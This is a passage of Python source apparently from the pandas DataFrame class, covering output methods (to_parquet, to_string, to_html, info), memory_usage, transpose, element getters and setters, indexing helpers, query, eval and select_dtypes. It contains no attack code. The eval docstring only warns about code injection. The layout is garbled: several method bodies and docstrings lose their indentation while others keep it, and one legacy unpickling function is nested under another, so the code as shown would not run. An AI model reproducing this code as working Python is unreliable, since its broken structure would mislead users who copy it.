               **kwargs):
    """
    Write a DataFrame to the binary parquet format.

    .. versionadded:: 0.21.0

    This function writes the dataframe as a `parquet file
    <https://parquet.apache.org/>`_. Different parquet backends may be
    chosen, with optional compression.

    Parameters
    ----------
    fname : str
        String file path.
    engine : {'auto', 'pyarrow', 'fastparquet'}, default 'auto'
        Parquet library to use. If 'auto', the ``io.parquet.engine``
        option is used; its default behavior is to try 'pyarrow',
        falling back to 'fastparquet' if unavailable.
    compression : {'snappy', 'gzip', 'brotli', None}, default 'snappy'
        Name of the compression to use. Use ``None`` for no
        compression.
    **kwargs
        Additional arguments passed to the parquet library.

    See Also
    --------
    read_parquet : Read a parquet file.
    DataFrame.to_csv : Write a csv file.
    DataFrame.to_sql : Write to a sql table.
    DataFrame.to_hdf : Write to hdf.

    Notes
    -----
    Requires either the `fastparquet` or `pyarrow` library.
    """
    from pandas.io.parquet import to_parquet as _write_parquet
    _write_parquet(self, fname, engine,
                   compression=compression, **kwargs)
@Substitution(header='Write out the column names. If a list of strings '
                     'is given, it is assumed to be aliases for the '
                     'column names')
@Appender(fmt.docstring_to_string, indents=1)
def to_string(self, buf=None, columns=None, col_space=None, header=True,
              index=True, na_rep='NaN', formatters=None, float_format=None,
              sparsify=None, index_names=True, justify=None,
              line_width=None, max_rows=None, max_cols=None,
              show_dimensions=False):
    """
    Render a DataFrame to a console-friendly tabular output.
    """
    format_kwargs = dict(buf=buf, columns=columns, col_space=col_space,
                         na_rep=na_rep, formatters=formatters,
                         float_format=float_format, sparsify=sparsify,
                         justify=justify, index_names=index_names,
                         header=header, index=index,
                         line_width=line_width, max_rows=max_rows,
                         max_cols=max_cols,
                         show_dimensions=show_dimensions)
    text_formatter = fmt.DataFrameFormatter(self, **format_kwargs)
    text_formatter.to_string()

    # Without an explicit buffer the rendered text is returned.
    if buf is None:
        return text_formatter.buf.getvalue()
@Substitution(header='whether to print column labels, default True')
@Appender(fmt.docstring_to_string, indents=1)
def to_html(self, buf=None, columns=None, col_space=None, header=True,
            index=True, na_rep='NaN', formatters=None, float_format=None,
            sparsify=None, index_names=True, justify=None, bold_rows=True,
            classes=None, escape=True, max_rows=None, max_cols=None,
            show_dimensions=False, notebook=False, decimal='.',
            border=None, table_id=None):
    """
    Render a DataFrame as an HTML table.

    `to_html`-specific options:

    bold_rows : boolean, default True
        Make the row labels bold in the output.
    classes : str or list or tuple, default None
        CSS class(es) to apply to the resulting html table.
    escape : boolean, default True
        Convert the characters <, >, and & to HTML-safe sequences.
    max_rows : int, optional
        Maximum number of rows to show before truncating; None shows
        all.
    max_cols : int, optional
        Maximum number of columns to show before truncating; None
        shows all.
    decimal : string, default '.'
        Character recognized as decimal separator, e.g. ',' in Europe.

        .. versionadded:: 0.18.0

    border : int
        A ``border=border`` attribute is included in the opening
        `<table>` tag. Default ``pd.options.html.border``.

        .. versionadded:: 0.19.0

    table_id : str, optional
        A css id included in the opening `<table>` tag if specified.

        .. versionadded:: 0.23.0
    """
    if (justify is not None and
            justify not in fmt._VALID_JUSTIFY_PARAMETERS):
        raise ValueError("Invalid value for justify parameter")

    html_kwargs = dict(buf=buf, columns=columns, col_space=col_space,
                       na_rep=na_rep, formatters=formatters,
                       float_format=float_format, sparsify=sparsify,
                       justify=justify, index_names=index_names,
                       header=header, index=index, bold_rows=bold_rows,
                       escape=escape, max_rows=max_rows,
                       max_cols=max_cols,
                       show_dimensions=show_dimensions,
                       decimal=decimal, table_id=table_id)
    html_formatter = fmt.DataFrameFormatter(self, **html_kwargs)
    # TODO: a generic formatter wld b in DataFrameFormatter
    html_formatter.to_html(classes=classes, notebook=notebook,
                           border=border)

    if buf is None:
        return html_formatter.buf.getvalue()
def info(self, verbose=None, buf=None, max_cols=None, memory_usage=None,
         null_counts=None):
    """
    Print a concise summary of a DataFrame.

    This method prints information about a DataFrame including the
    index dtype and column dtypes, non-null values and memory usage.

    Parameters
    ----------
    verbose : bool, optional
        Whether to print the full summary. By default, the setting in
        ``pandas.options.display.max_info_columns`` is followed.
    buf : writable buffer, defaults to sys.stdout
        Where to send the output. Pass a writable buffer to further
        process the output.
    max_cols : int, optional
        When to switch from the verbose to the truncated output. If
        the DataFrame has more than `max_cols` columns, the truncated
        output is used. Defaults to the
        ``pandas.options.display.max_info_columns`` setting.
    memory_usage : bool, str, optional
        Whether total memory usage of the DataFrame elements
        (including the index) is displayed. Defaults to the
        ``pandas.options.display.memory_usage`` setting. A value of
        'deep' performs a real (slower) memory introspection;
        otherwise an estimate based on column dtype and row count is
        shown in human-readable, base-2 units.
    null_counts : bool, optional
        Whether to show the non-null counts. By default, shown only
        if the frame is smaller than
        ``pandas.options.display.max_info_rows`` and
        ``pandas.options.display.max_info_columns``.

    Returns
    -------
    None
        The summary is written to ``buf``; nothing is returned.

    See Also
    --------
    DataFrame.describe: Generate descriptive statistics of DataFrame
        columns.
    DataFrame.memory_usage: Memory usage of DataFrame columns.
    """
    if buf is None:  # pragma: no cover
        buf = sys.stdout

    output = [str(type(self)), self.index._summary()]

    if len(self.columns) == 0:
        output.append('Empty %s' % type(self).__name__)
        fmt.buffer_put_lines(buf, output)
        return

    cols = self.columns

    # hack
    if max_cols is None:
        max_cols = get_option('display.max_info_columns',
                              len(self.columns) + 1)
    max_rows = get_option('display.max_info_rows', len(self) + 1)

    if null_counts is None:
        # Counting nulls is O(n*m); only do it by default when small.
        show_counts = (len(self.columns) <= max_cols and
                       len(self) < max_rows)
    else:
        show_counts = null_counts
    exceeds_info_cols = len(self.columns) > max_cols

    def _append_verbose():
        # One line per column: "<name>   <count> non-null <dtype>".
        output.append('Data columns (total %d columns):' %
                      len(self.columns))
        space = max(len(pprint_thing(k)) for k in self.columns) + 4

        counts = None
        tmpl = "%s%s"
        if show_counts:
            counts = self.count()
            if len(cols) != len(counts):  # pragma: no cover
                raise AssertionError('Columns must equal counts (%d != %d)'
                                     % (len(cols), len(counts)))
            tmpl = "%s non-null %s"

        dtypes = self.dtypes
        for i, col in enumerate(self.columns):
            dtype = dtypes.iloc[i]
            col = pprint_thing(col)
            count = counts.iloc[i] if show_counts else ""
            output.append(_put_str(col, space) + tmpl % (count, dtype))

    def _append_non_verbose():
        output.append(self.columns._summary(name='Columns'))

    def _human_size(num, size_qualifier):
        # Render a byte count in human readable, base-2 units.
        for unit in ['bytes', 'KB', 'MB', 'GB', 'TB']:
            if num < 1024.0:
                return "%3.1f%s %s" % (num, size_qualifier, unit)
            num /= 1024.0
        return "%3.1f%s %s" % (num, size_qualifier, 'PB')

    if verbose:
        _append_verbose()
    elif verbose is False:  # specifically set to False, not nesc None
        _append_non_verbose()
    elif exceeds_info_cols:
        _append_non_verbose()
    else:
        _append_verbose()

    counts = self.get_dtype_counts()
    dtypes = ['%s(%d)' % k for k in sorted(compat.iteritems(counts))]
    output.append('dtypes: %s' % ', '.join(dtypes))

    if memory_usage is None:
        memory_usage = get_option('display.memory_usage')
    if memory_usage:
        # append memory usage of df to display
        size_qualifier = ''
        if memory_usage == 'deep':
            deep = True
        else:
            # size_qualifier '+' marks the total as a lower bound:
            # object columns (and some index types) need deep
            # introspection for a true size.
            deep = False
            if ('object' in counts or
                    self.index._is_memory_usage_qualified()):
                size_qualifier = '+'
        mem_usage = self.memory_usage(index=True, deep=deep).sum()
        output.append("memory usage: %s\n" %
                      _human_size(mem_usage, size_qualifier))
    fmt.buffer_put_lines(buf, output)
def memory_usage(self, index=True, deep=False):
    """
    Return the memory usage of each column in bytes.

    The memory usage can optionally include the contribution of the
    index and of elements of `object` dtype. This value is displayed
    in `DataFrame.info` by default; that can be suppressed by setting
    ``pandas.options.display.memory_usage`` to False.

    Parameters
    ----------
    index : bool, default True
        Whether to include the memory usage of the DataFrame's index
        in the returned Series. If ``index=True`` the index's usage is
        the first item in the output.
    deep : bool, default False
        If True, introspect the data deeply by interrogating `object`
        dtypes for system-level memory consumption, and include it in
        the returned values.

    Returns
    -------
    sizes : Series
        A Series whose index is the original column names and whose
        values is the memory usage of each column in bytes.

    See Also
    --------
    numpy.ndarray.nbytes : Total bytes consumed by the elements of an
        ndarray.
    Series.memory_usage : Bytes consumed by a Series.
    pandas.Categorical : Memory-efficient array for string values with
        many repeated values.
    DataFrame.info : Concise summary of a DataFrame.
    """
    per_column = [c.memory_usage(index=False, deep=deep)
                  for col, c in self.iteritems()]
    result = Series(per_column, index=self.columns)
    if index:
        # Prepend the index's own footprint under the label 'Index'.
        index_usage = Series(self.index.memory_usage(deep=deep),
                             index=['Index'])
        result = index_usage.append(result)
    return result
def transpose(self, *args, **kwargs):
    """
    Transpose index and columns.

    Reflect the DataFrame over its main diagonal by writing rows as
    columns and vice-versa. The property :attr:`.T` is an accessor to
    this method.

    Parameters
    ----------
    copy : bool, default False
        If True, the underlying data is copied. Otherwise (default),
        no copy is made if possible.
    *args, **kwargs
        Additional keywords have no effect but might be accepted for
        compatibility with numpy.

    Returns
    -------
    DataFrame
        The transposed DataFrame.

    See Also
    --------
    numpy.transpose : Permute the dimensions of a given array.

    Notes
    -----
    Transposing a DataFrame with mixed dtypes results in a homogeneous
    DataFrame with the `object` dtype; in that case a copy of the data
    is always made.

    Examples
    --------
    >>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
    >>> df.T
          0  1
    col1  1  2
    col2  3  4
    """
    # Positional arguments exist only for numpy compatibility; reject
    # anything numpy's transpose would not accept.
    nv.validate_transpose(args, dict())
    # For a 2-D frame, transposing is simply swapping the two axes on
    # the generic implementation.
    return super(DataFrame, self).transpose(1, 0, **kwargs)

T = property(transpose)
# ----------------------------------------------------------------------
# Picklability
# legacy pickle formats
def _unpickle_frame_compat(self, state):  # pragma: no cover
    """Restore state written by a legacy (pre-block-manager) pickle."""
    if len(state) == 2:  # pragma: no cover
        # Oldest format: (series_dict, pickled_index). Columns were
        # not stored, so fall back to the sorted dict keys.
        series, idx = state
        columns = sorted(series)
    else:
        series, cols, idx = state
        columns = com._unpickle_array(cols)

    self._data = self._init_dict(series, com._unpickle_array(idx),
                                 columns, None)
    def _unpickle_matrix_compat(self, state):  # pragma: no cover
        """Restore a DataFrame from a legacy matrix-style pickle state.

        ``state`` is ``((values, index, columns), object_state)``; the
        optional ``object_state`` carries object-dtype columns that are
        joined back onto the numeric block.
        """
        # old unpickling
        (vals, idx, cols), object_state = state
        index = com._unpickle_array(idx)
        dm = DataFrame(vals, index=index, columns=com._unpickle_array(cols),
                       copy=False)
        if object_state is not None:
            ovals, _, ocols = object_state
            objects = DataFrame(ovals, index=index,
                                columns=com._unpickle_array(ocols), copy=False)
            # merge the object-dtype columns back in
            dm = dm.join(objects)
        self._data = dm._data
# ----------------------------------------------------------------------
# Getting and setting elements
def get_value(self, index, col, takeable=False):
"""Quickly retrieve single value at passed column and index
.. deprecated:: 0.21.0
Use .at[] or .iat[] accessors instead.
Parameters
----------
index : row label
col : column label
takeable : interpret the index/col as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(index, col, takeable=takeable)
    def _get_value(self, index, col, takeable=False):
        # Positional fast path: fetch the column by position and box the raw
        # value (datetimelike scalars are wrapped by the helper).
        if takeable:
            series = self._iget_item_cache(col)
            return com._maybe_box_datetimelike(series._values[index])

        # Label-based path: use the index engine for the lookup.
        series = self._get_item_cache(col)
        engine = self.index._engine
        try:
            return engine.get_value(series._values, index)
        except (TypeError, ValueError):
            # we cannot handle direct indexing
            # use positional
            col = self.columns.get_loc(col)
            index = self.index.get_loc(index)
            return self._get_value(index, col, takeable=True)
    # share the public method's (deprecation) docstring
    _get_value.__doc__ = get_value.__doc__
def set_value(self, index, col, value, takeable=False):
"""Put single value at passed column and index
.. deprecated:: 0.21.0
Use .at[] or .iat[] accessors instead.
Parameters
----------
index : row label
col : column label
value : scalar value
takeable : interpret the index/col as indexers, default False
Returns
-------
frame : DataFrame
If label pair is contained, will be reference to calling DataFrame,
otherwise a new object
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(index, col, value, takeable=takeable)
    def _set_value(self, index, col, value, takeable=False):
        try:
            if takeable is True:
                # positional path: set directly on the column Series
                series = self._iget_item_cache(col)
                return series._set_value(index, value, takeable=True)

            # label-based path: write through the index engine in place
            series = self._get_item_cache(col)
            engine = self.index._engine
            engine.set_value(series._values, index, value)
            return self
        except (KeyError, TypeError):
            # set using a non-recursive method & reset the cache
            self.loc[index, col] = value
            self._item_cache.pop(col, None)
            return self
    # share the public method's (deprecation) docstring
    _set_value.__doc__ = set_value.__doc__
    def _ixs(self, i, axis=0):
        """
        Positional indexing along one axis.

        i : int, slice, or sequence of integers
        axis : int
            0 selects rows, anything else selects columns.
        """
        # irow
        if axis == 0:
            """
            Notes
            -----
            If slice passed, the resulting data will be a view
            """
            if isinstance(i, slice):
                return self[i]
            else:
                label = self.index[i]
                if isinstance(label, Index):
                    # a location index by definition
                    result = self.take(i, axis=axis)
                    copy = True
                else:
                    # single row: cross-section of the underlying blocks
                    new_values = self._data.fast_xs(i)
                    if is_scalar(new_values):
                        return new_values
                    # if we are a copy, mark as such
                    copy = (isinstance(new_values, np.ndarray) and
                            new_values.base is None)
                    result = self._constructor_sliced(new_values,
                                                      index=self.columns,
                                                      name=self.index[i],
                                                      dtype=new_values.dtype)
                result._set_is_copy(self, copy=copy)
                return result
        # icol
        else:
            """
            Notes
            -----
            If slice passed, the resulting data will be a view
            """
            label = self.columns[i]
            if isinstance(i, slice):
                # need to return view
                lab_slice = slice(label[0], label[-1])
                return self.loc[:, lab_slice]
            else:
                if isinstance(label, Index):
                    # multiple columns selected positionally
                    return self._take(i, axis=1, convert=True)
                index_len = len(self.index)
                # if the values returned are not the same length
                # as the index (iow a not found value), iget returns
                # a 0-len ndarray. This is effectively catching
                # a numpy error (as numpy should really raise)
                values = self._data.iget(i)
                if index_len and not len(values):
                    values = np.array([np.nan] * index_len, dtype=object)
                result = self._box_col_values(values, label)
                # this is a cached value, mark it so
                result._set_as_cached(label, self)
                return result
def __getitem__(self, key):
key = com._apply_if_callable(key, self)
# shortcut if we are an actual column
is_mi_columns = isinstance(self.columns, MultiIndex)
try:
if key in self.columns and not is_mi_columns:
return self._getitem_column(key)
except:
pass
# see if we can slice the rows
indexer = convert_to_index_sliceable(self, key)
if indexer is not None:
return self._getitem_slice(indexer)
if isinstance(key, (Series, np.ndarray, Index, list)):
# either boolean or fancy integer index
return self._getitem_array(key)
elif isinstance(key, DataFrame):
return self._getitem_frame(key)
elif is_mi_columns:
return self._getitem_multilevel(key)
else:
return self._getitem_column(key)
def _getitem_column(self, key):
""" return the actual column """
# get column
if self.columns.is_unique:
return self._get_item_cache(key)
# duplicate columns & possible reduce dimensionality
result = self._constructor(self._data.get(key))
if result.columns.is_unique:
result = result[key]
return result
def _getitem_slice(self, key):
return self._slice(key, axis=0)
    def _getitem_array(self, key):
        """Select with an array-like key: boolean mask (rows) or a list of
        column labels/positions."""
        # also raises Exception if object array with NA values
        if com.is_bool_indexer(key):
            # warning here just in case -- previously __setitem__ was
            # reindexing but __getitem__ was not; it seems more reasonable to
            # go with the __setitem__ behavior since that is more consistent
            # with all other indexing behavior
            if isinstance(key, Series) and not key.index.equals(self.index):
                warnings.warn("Boolean Series key will be reindexed to match "
                              "DataFrame index.", UserWarning, stacklevel=3)
            elif len(key) != len(self.index):
                # non-Series boolean keys must match the row count exactly
                raise ValueError('Item wrong length %d instead of %d.' %
                                 (len(key), len(self.index)))
            # check_bool_indexer will throw exception if Series key cannot
            # be reindexed to match DataFrame rows
            key = check_bool_indexer(self.index, key)
            indexer = key.nonzero()[0]
            return self._take(indexer, axis=0, convert=False)
        else:
            # non-boolean: treat as a column selection
            indexer = self.loc._convert_to_indexer(key, axis=1)
            return self._take(indexer, axis=1, convert=True)
    def _getitem_multilevel(self, key):
        """Select from MultiIndex columns; a partial key returns a frame
        with the matched level(s) dropped."""
        loc = self.columns.get_loc(key)
        if isinstance(loc, (slice, Series, np.ndarray, Index)):
            # partial key matched several columns
            new_columns = self.columns[loc]
            result_columns = maybe_droplevels(new_columns, key)
            if self._is_mixed_type:
                result = self.reindex(columns=new_columns)
                result.columns = result_columns
            else:
                new_values = self.values[:, loc]
                result = self._constructor(new_values, index=self.index,
                                           columns=result_columns)
                result = result.__finalize__(self)

            # If there is only one column being returned, and its name is
            # either an empty string, or a tuple with an empty string as its
            # first element, then treat the empty string as a placeholder
            # and return the column as if the user had provided that empty
            # string in the key. If the result is a Series, exclude the
            # implied empty string from its name.
            if len(result.columns) == 1:
                top = result.columns[0]
                if isinstance(top, tuple):
                    top = top[0]
                if top == '':
                    result = result['']
                    if isinstance(result, Series):
                        result = self._constructor_sliced(result,
                                                          index=self.index,
                                                          name=key)

            result._set_is_copy(self)
            return result
        else:
            # exact match: single column
            return self._get_item_cache(key)
def _getitem_frame(self, key):
if key.values.size and not is_bool_dtype(key.values):
raise ValueError('Must pass DataFrame with boolean values only')
return self.where(key)
    def query(self, expr, inplace=False, **kwargs):
        """Query the columns of a frame with a boolean expression.
        Parameters
        ----------
        expr : string
            The query string to evaluate. You can refer to variables
            in the environment by prefixing them with an '@' character like
            ``@a + b``.
        inplace : bool
            Whether the query should modify the data in place or return
            a modified copy
            .. versionadded:: 0.18.0
        kwargs : dict
            See the documentation for :func:`pandas.eval` for complete details
            on the keyword arguments accepted by :meth:`DataFrame.query`.
        Returns
        -------
        q : DataFrame
        Notes
        -----
        The result of the evaluation of this expression is first passed to
        :attr:`DataFrame.loc` and if that fails because of a
        multidimensional key (e.g., a DataFrame) then the result will be passed
        to :meth:`DataFrame.__getitem__`.
        This method uses the top-level :func:`pandas.eval` function to
        evaluate the passed query.
        The :meth:`~pandas.DataFrame.query` method uses a slightly
        modified Python syntax by default. For example, the ``&`` and ``|``
        (bitwise) operators have the precedence of their boolean cousins,
        :keyword:`and` and :keyword:`or`. This *is* syntactically valid Python,
        however the semantics are different.
        You can change the semantics of the expression by passing the keyword
        argument ``parser='python'``. This enforces the same semantics as
        evaluation in Python space. Likewise, you can pass ``engine='python'``
        to evaluate an expression using Python itself as a backend. This is not
        recommended as it is inefficient compared to using ``numexpr`` as the
        engine.
        The :attr:`DataFrame.index` and
        :attr:`DataFrame.columns` attributes of the
        :class:`~pandas.DataFrame` instance are placed in the query namespace
        by default, which allows you to treat both the index and columns of the
        frame as a column in the frame.
        The identifier ``index`` is used for the frame index; you can also
        use the name of the index to identify it in a query. Please note that
        Python keywords may not be used as identifiers.
        For further details and examples see the ``query`` documentation in
        :ref:`indexing <indexing.query>`.
        See Also
        --------
        pandas.eval
        DataFrame.eval
        Examples
        --------
        >>> from numpy.random import randn
        >>> from pandas import DataFrame
        >>> df = pd.DataFrame(randn(10, 2), columns=list('ab'))
        >>> df.query('a > b')
        >>> df[df.a > df.b]  # same result as the previous expression
        """
        inplace = validate_bool_kwarg(inplace, 'inplace')
        if not isinstance(expr, compat.string_types):
            msg = "expr must be a string to be evaluated, {0} given"
            raise ValueError(msg.format(type(expr)))
        # bump 'level' so that variable resolution in pandas.eval presumably
        # starts at our caller's frame -- NOTE(review): confirm against the
        # pandas.eval 'level' semantics
        kwargs['level'] = kwargs.pop('level', 0) + 1
        kwargs['target'] = None
        res = self.eval(expr, **kwargs)

        try:
            new_data = self.loc[res]
        except ValueError:
            # when res is multi-dimensional loc raises, but this is sometimes a
            # valid query
            new_data = self[res]

        if inplace:
            self._update_inplace(new_data)
        else:
            return new_data
    def eval(self, expr, inplace=False, **kwargs):
        """
        Evaluate a string describing operations on DataFrame columns.
        Operates on columns only, not specific rows or elements. This allows
        `eval` to run arbitrary code, which can make you vulnerable to code
        injection if you pass user input to this function.
        Parameters
        ----------
        expr : str
            The expression string to evaluate.
        inplace : bool, default False
            If the expression contains an assignment, whether to perform the
            operation inplace and mutate the existing DataFrame. Otherwise,
            a new DataFrame is returned.
            .. versionadded:: 0.18.0.
        kwargs : dict
            See the documentation for :func:`~pandas.eval` for complete details
            on the keyword arguments accepted by
            :meth:`~pandas.DataFrame.query`.
        Returns
        -------
        ndarray, scalar, or pandas object
            The result of the evaluation.
        See Also
        --------
        DataFrame.query : Evaluates a boolean expression to query the columns
            of a frame.
        DataFrame.assign : Can evaluate an expression or function to create new
            values for a column.
        pandas.eval : Evaluate a Python expression as a string using various
            backends.
        Notes
        -----
        For more details see the API documentation for :func:`~pandas.eval`.
        For detailed examples see :ref:`enhancing performance with eval
        <enhancingperf.eval>`.
        Examples
        --------
        >>> df = pd.DataFrame({'A': range(1, 6), 'B': range(10, 0, -2)})
        >>> df
           A   B
        0  1  10
        1  2   8
        2  3   6
        3  4   4
        4  5   2
        >>> df.eval('A + B')
        0    11
        1    10
        2     9
        3     8
        4     7
        dtype: int64
        Assignment is allowed though by default the original DataFrame is not
        modified.
        >>> df.eval('C = A + B')
           A   B   C
        0  1  10  11
        1  2   8  10
        2  3   6   9
        3  4   4   8
        4  5   2   7
        >>> df
           A   B
        0  1  10
        1  2   8
        2  3   6
        3  4   4
        4  5   2
        Use ``inplace=True`` to modify the original DataFrame.
        >>> df.eval('C = A + B', inplace=True)
        >>> df
           A   B   C
        0  1  10  11
        1  2   8  10
        2  3   6   9
        3  4   4   8
        4  5   2   7
        """
        from pandas.core.computation.eval import eval as _eval

        inplace = validate_bool_kwarg(inplace, 'inplace')
        resolvers = kwargs.pop('resolvers', None)
        # bump 'level' to account for this wrapper frame
        kwargs['level'] = kwargs.pop('level', 0) + 1
        if resolvers is None:
            # default resolvers: the frame's columns first, then
            # index/columns-derived resolvers
            index_resolvers = self._get_index_resolvers()
            resolvers = dict(self.iteritems()), index_resolvers
        if 'target' not in kwargs:
            kwargs['target'] = self
        kwargs['resolvers'] = kwargs.get('resolvers', ()) + tuple(resolvers)
        return _eval(expr, inplace=inplace, **kwargs)
    def select_dtypes(self, include=None, exclude=None):
        """
        Return a subset of the DataFrame's columns based on the column dtypes.
        Parameters
        ----------
        include, exclude : scalar or list-like
            A selection of dtypes or strings to be included/excluded. At least
            one of these parameters must be supplied.
        Raises
        ------
        ValueError
            * If both of ``include`` and ``exclude`` are empty
            * If ``include`` and ``exclude`` have overlapping elements
            * If any kind of string dtype is passed in.
        Returns
        -------
        subset : DataFrame
            The subset of the frame including the dtypes in ``include`` and
            excluding the dtypes in ``exclude``.
        Notes
        -----
        * To select all *numeric* types, use ``np.number`` or ``'number'``
        * To select strings you must use the ``object`` dtype, but note that
          this will return *all* object dtype columns
        * See the `numpy dtype hierarchy
          <http://docs.scipy.org/doc/numpy/reference/arrays.scalars.html>`__
        * To select datetimes, use ``np.datetime64``, ``'datetime'`` or
          ``'datetime64'``
        * To select timedeltas, use ``np.timedelta64``, ``'timedelta'`` or
          ``'timedelta64'``
        * To select Pandas categorical dtypes, use ``'category'``
        * To select Pandas datetimetz dtypes, use ``'datetimetz'`` (new in
          0.20.0) or ``'datetime64[ns, tz]'``
        Examples
        --------
        >>> df = pd.DataFrame({'a': [1, 2] * 3,
        ...                    'b': [True, False] * 3,
        ...                    'c': [1.0, 2.0] * 3})
        >>> df
                a      b  c
        0       1   True  1.0
        1       2  False  2.0
        2       1   True  1.0
        3       2  False  2.0
        4       1   True  1.0
        5       2  False  2.0
        >>> df.select_dtypes(include='bool')
           b
        0  True
        1  False
        2  True
        3  False
        4  True
        5  False
        >>> df.select_dtypes(include=['float64'])
           c
        0  1.0
        1  2.0
        2  1.0
        3  2.0
        4  1.0
        5  2.0
        >>> df.select_dtypes(exclude=['int'])
               b    c
        0   True  1.0
        1  False  2.0
        2   True  1.0
        3  False  2.0
        4   True  1.0
        5  False  2.0
        """
        # normalize scalars to 1-tuples, None to empty tuples
        if not is_list_like(include):
            include = (include,) if include is not None else ()
        if not is_list_like(exclude):
            exclude = (exclude,) if exclude is not None else ()

        selection = tuple(map(frozenset, (include, exclude)))

        if not any(selection):
            raise ValueError('at least one of include or exclude must be '
                             'nonempty')

        # convert the myriad valid dtypes object to a single representation
        include, exclude = map(
            lambda x: frozenset(map(_get_dtype_from_object, x)), selection)
        for dtypes in (include, exclude):
            invalidate_string_dtypes(dtypes)

        # can't both include AND exclude!
        if not include.isdisjoint(exclude):
            raise ValueError('include and exclude overlap on %s' %
                             (include & exclude))

        # empty include/exclude -> defaults to True
        # three cases (we've already raised if both are empty)
        # case 1: empty include, nonempty exclude
        # we have True, True, ... True for include, same for exclude
        # in the loop below we get the excluded
        # and when we call '&' below we get only the excluded
        # case 2: nonempty include, empty exclude
        # same as case 1, but with include
        # case 3: both nonempty
        # the "union" of the logic of case 1 and case 2:
        # we get the included and excluded, and return their logical and
        include_these = Series(not bool(include), index=self.columns)
        exclude_these = Series(not bool(exclude), index=self.columns)

        def is_dtype_instance_mapper(column, dtype):
            # pair each column with a dtype-subclass predicate
            return column, functools.partial(issubclass, dtype.type)

        for column, f in itertools.starmap(is_dtype_instance_mapper,
                                           self.dtypes.iteritems()):
            if include:  # checks for the case of empty include or exclude
                include_these[column] = any(map(f, include))
            if exclude:
                exclude_these[column] = not any(map(f, exclude))

        dtype_indexer = include_these & exclude_these
        return self.loc[com._get_info_slice(self, dtype_indexer)]
def _box_item_values(self, key, values):
items = self.columns[self.columns.get_loc(key)]
if values.ndim == 2:
return self._constructor(values.T, columns=items, index=self.index)
else:
return self._box_col_values(values, items)
def _box_col_values(self, values, items):
""" provide boxed values for a column """
klass = _get_sliced_frame_result_type(values, self)
return klass(values, index=self.index, name=items, fastpath=True)
def __setitem__(self, key, value):
key = com._apply_if_callable(key, self)
# see if we can slice the rows
indexer = convert_to_index_sliceable(self, key)
if indexer is not None:
return self._setitem_slice(indexer, value)
if isinstance(key, DataFrame) or getattr(key, 'ndim', None) == 2:
self._setitem_frame(key, value)
elif isinstance(key, (Series, np.ndarray, list, Index)):
self._setitem_array(key, value)
else:
# set column
self._set_item(key, value)
def _setitem_slice(self, key, value):
self._check_setitem_copy()
self.loc._setitem_with_indexer(key, value)
    def _setitem_array(self, key, value):
        """Assign ``value`` under an array-like key: boolean row mask or a
        list of column labels."""
        # also raises Exception if object array with NA values
        if com.is_bool_indexer(key):
            if len(key) != len(self.index):
                raise ValueError('Item wrong length %d instead of %d!' %
                                 (len(key), len(self.index)))
            key = check_bool_indexer(self.index, key)
            indexer = key.nonzero()[0]
            self._check_setitem_copy()
            self.loc._setitem_with_indexer(indexer, value)
        else:
            if isinstance(value, DataFrame):
                # frame value: align column-by-column, positionally
                if len(value.columns) != len(key):
                    raise ValueError('Columns must be same length as key')
                for k1, k2 in zip(key, value.columns):
                    self[k1] = value[k2]
            else:
                indexer = self.loc._convert_to_indexer(key, axis=1)
                self._check_setitem_copy()
                self.loc._setitem_with_indexer((slice(None), indexer), value)
    def _setitem_frame(self, key, value):
        # support boolean setting with DataFrame input, e.g.
        # df[df > df2] = 0
        if isinstance(key, np.ndarray):
            if key.shape != self.shape:
                raise ValueError(
                    'Array conditional must be same shape as self'
                )
            # promote raw ndarray masks to a frame aligned with self
            key = self._constructor(key, **self._construct_axes_dict())

        if key.values.size and not is_bool_dtype(key.values):
            raise TypeError(
                'Must pass DataFrame or 2-d ndarray with boolean values only'
            )

        self._check_inplace_setting(value)
        self._check_setitem_copy()
        # ``-key`` negates the boolean mask here: _where fills where the
        # condition is False, so we set positions where ``key`` is True
        self._where(-key, value, inplace=True)
def _ensure_valid_index(self, value):
"""
ensure that if we don't have an index, that we can create one from the
passed value
"""
# GH5632, make sure that we are a Series convertible
if not len(self.index) and is_list_like(value):
try:
value = Series(value)
except:
raise ValueError('Cannot set a frame with no defined index '
'and a value that cannot be converted to a '
'Series')
self._data = self._data.reindex_axis(value.index.copy(), axis=1,
fill_value=np.nan)
    def _set_item(self, key, value):
        """
        Add series to DataFrame in specified column.
        If series is a numpy-array (not a Series/TimeSeries), it must be the
        same length as the DataFrames index or an error will be thrown.
        Series/TimeSeries will be conformed to the DataFrames index to
        ensure homogeneity.
        """
        self._ensure_valid_index(value)
        # conform/copy the value into a column-shaped ndarray
        value = self._sanitize_column(key, value)
        NDFrame._set_item(self, key, value)

        # check if we are modifying a copy
        # try to set first as we want an invalid
        # value exception to occur first
        if len(self):
            self._check_setitem_copy()
def insert(self, loc, column, value, allow_duplicates=False):
"""
Insert column into DataFrame at specified location.
Raises a ValueError if `column` is already contained in the DataFrame,
unless `allow_duplicates` is set to True.
Parameters
----------
loc : int
Insertion index. Must verify 0 <= loc <= len(columns)
column : string, number, or hashable object
label of the inserted column
value : int, Series, or array-like
allow_duplicates : bool, optional
"""
self._ensure_valid_index(value)
value = self._sanitize_column(column, value, broadcast=False)
self._data.insert(loc, column, value,
allow_duplicates=allow_duplicates)
    def assign(self, **kwargs):
        r"""
        Assign new columns to a DataFrame, returning a new object
        (a copy) with all the original columns in addition to the new ones.
        Parameters
        ----------
        kwargs : keyword, value pairs
            keywords are the column names. If the values are
            callable, they are computed on the DataFrame and
            assigned to the new columns. The callable must not
            change input DataFrame (though pandas doesn't check it).
            If the values are not callable, (e.g. a Series, scalar, or array),
            they are simply assigned.
        Returns
        -------
        df : DataFrame
            A new DataFrame with the new columns in addition to
            all the existing columns.
        Notes
        -----
        Assigning multiple columns within the same ``assign`` is possible.
        For Python 3.6 and above, later items in '\*\*kwargs' may refer to
        newly created or modified columns in 'df'; items are computed and
        assigned into 'df' in order.  For Python 3.5 and below, the order of
        keyword arguments is not specified, you cannot refer to newly created
        or modified columns. All items are computed first, and then assigned
        in alphabetical order.
        .. versionchanged :: 0.23.0
           Keyword argument order is maintained for Python 3.6 and later.
        Examples
        --------
        >>> df = pd.DataFrame({'A': range(1, 11), 'B': np.random.randn(10)})
